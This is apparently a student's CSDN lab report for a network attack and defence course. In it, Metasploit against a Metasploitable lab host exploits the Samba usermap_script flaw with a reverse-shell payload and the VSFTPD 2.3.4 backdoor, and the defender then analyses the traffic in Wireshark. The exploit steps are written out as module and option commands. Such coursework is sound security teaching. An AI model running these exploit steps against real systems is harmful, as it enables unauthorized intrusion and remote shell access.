20232802 黄千里 2023-2024-2 《网络攻防实践》实践七报告

本文详细描述了使用Metasploit进行Linux远程渗透攻击的过程,包括查找漏洞、配置payload、实施攻击以及攻防对抗中的防御措施。作者还分享了解决问题和实践总结,强调了通过实践提升网络攻防技能的重要性。
摘要由CSDN通过智能技术生成

20232802 黄千里 2023-2024-2 《网络攻防实践》实践七报告

一、实践过程

1.使用Metasploit进行Linux远程渗透攻击

本次实验使用的攻击机为Kali,IP地址为192.168.200.2;靶机为Metasploit Ubuntu,IP地址为192.168.200.123:
首先提权后输入msfconsole在Kali上打开Metasploit:
在这里插入图片描述
查找要目标漏洞对应的模块samba
search samba
在这里插入图片描述
输入命令use exploit/multi/samba/usermap_script可使用该模块。
输入命令show payloads查看可用载荷
在这里插入图片描述
选择攻击载荷set payload payload/cmd/unix/reverse
查看需要配置的参数show options
在这里插入图片描述
配置所需的参数
set RHOST 192.168.200.123,set LHOST 192.168.200.2
在这里插入图片描述
设置完成后,输入run启动攻击
攻击成功
在这里插入图片描述

2.攻防对抗实践

两人连接到同一个局域网中,攻击机kali和靶机metasploit的IP地址分别192.168.86.194
和192.168.86.237
开启metasploit
在这里插入图片描述
连通之后使用nmap -sV -p 192.168.86.237扫描目标主机的开放端口与版本号等信息:
在这里插入图片描述
漏洞介绍:对VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用
查询是否有可被利用的模块search vsftp:
use 0
在这里插入图片描述
选择第0个payload
set RHOST
set LHOST
在这里插入图片描述
可以看到攻击成功
在这里插入图片描述
防守方监听:对第二次的攻击进行防守
利用wireshark对网卡进行监听,可以分析得到,攻击者IP为192.168.86.223,攻击者利用的是6200端口进行攻击,在攻击成功后进行了ifconfig等操作
在这里插入图片描述

二、学习中遇到的问题及解决

  • 问题1:在看wireshark数据包时,不知道怎么分析出攻击者是利用哪个端口(服务)的漏洞进行攻击的
    在这里插入图片描述
  • 问题1解决方案:经过询问同学,获知从抓取数据包找最上面一个包的端口信息,对端口的理解也变得更深

三、实践总结

在实验中会遇到一些不理解的,错误的步骤,解决后会觉得成就感满满。从之前理解不到位的端口和网段,每一次亲自试错并解决错误都会感觉收获很大。
本次使用Metasploit进行Linux远程渗透攻击,进一步熟悉了Metasploit工具的使用,其次通过攻防对抗过程,动手进行了从漏洞信息搜集、漏洞利用、渗透攻击到获取目标主机权限的过程,理解了这些操作的运作原理,提高了自己的实践能力。

参考资料

  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值